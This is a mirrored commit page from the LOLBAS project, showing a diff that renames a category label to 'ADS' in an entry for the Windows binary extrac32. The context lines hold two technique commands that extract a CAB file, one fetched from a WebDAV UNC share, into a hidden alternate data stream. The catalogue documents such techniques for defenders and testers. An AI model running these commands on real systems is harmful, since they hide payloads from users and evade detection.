public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-07-27 12:42:19 +02:00
Code Issues Projects Releases Wiki Activity

Changed alternate data stream to ADS as category

Browse Source
This commit is contained in:
Oddvar Moe
2018-09-26 09:34:01 +02:00
parent 7961a99173
commit d48273583e
19 changed files with 28 additions and 25 deletions
Download Patch File Download Diff File Expand all files Collapse all files

4
yml/OSBinaries/Extrac32.yml
View File

@@ -7,7 +7,7 @@ Commands:
- Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.
Usecase: Extract data from cab file and hide it in an alternate data stream.
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
@@ -15,7 +15,7 @@ Commands:
- Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.
Usecase: Extract data from cab file and hide it in an alternate data stream.
Category: Alternate data streams
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096